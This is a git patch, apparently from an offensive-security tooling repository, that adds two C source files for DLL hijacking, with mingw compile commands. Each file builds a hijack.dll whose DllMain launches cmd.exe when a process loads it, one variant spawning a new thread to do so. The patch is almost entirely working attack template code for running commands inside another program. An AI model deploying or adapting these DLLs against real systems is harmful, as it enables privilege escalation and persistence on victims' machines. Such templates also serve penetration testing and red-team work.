From 4bf83d40291ed3942791759c740ee5541bf7092b Mon Sep 17 00:00:00 2001 From: heqnx Date: Tue, 13 May 2025 21:46:34 +0300 Subject: added dll hijacks --- dll_hijack.c | 29 +++++++++++++++++++++++++++++ dll_hijack_thread.c | 29 +++++++++++++++++++++++++++++ 2 files changed, 58 insertions(+) create mode 100644 dll_hijack.c create mode 100644 dll_hijack_thread.c diff --git a/dll_hijack.c b/dll_hijack.c new file mode 100644 index 0000000..547098e --- /dev/null +++ b/dll_hijack.c @@ -0,0 +1,29 @@ +/* + Compile with: + + i686-w64-mingw32-g++ dll_hijack.c -lws2_32 -shared -o hijack.dll + x86_64-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll + i686-w64-mingw32-gcc dll_hijack.c -shared -o hijack.dll +*/ + +#include + +void Entry () { + system("cmd.exe"); + //WinExec("cmd.exe", 0); +} + +BOOL WINAPI DllMain (HANDLE hModule, DWORD dwReason, LPVOID lpReserved) { + switch(dwReason) { + case DLL_PROCESS_ATTACH: + Entry(); + break; + case DLL_PROCESS_DETACH: + break; + case DLL_THREAD_ATTACH: + break; + case DLL_THREAD_DETACH: + break; + } + return TRUE; +} diff --git a/dll_hijack_thread.c b/dll_hijack_thread.c new file mode 100644 index 0000000..9c205b3 --- /dev/null +++ b/dll_hijack_thread.c @@ -0,0 +1,29 @@ +/* + Compile with: + + i686-w64-mingw32-gcc dll_hijack_thread.c -shared -lws2_32 -o hijack.dll +*/ + +#include +#include +#include + +void Entry () { + system("cmd.exe"); + //WinExec("cmd.exe", 0); +} + +BOOL APIENTRY DllMain (HMODULE hModule, DWORD dwReason, LPVOID lpReserved) { + switch (dwReason) { + case DLL_PROCESS_ATTACH: + CreateThread(0,0,(LPTHREAD_START_ROUTINE)Entry,0,0,0); + break; + case DLL_PROCESS_DETACH: + break; + case DLL_THREAD_DETACH: + break; + case DLL_THREAD_ATTACH: + break; + } + return TRUE; +} -- cgit v1.2.3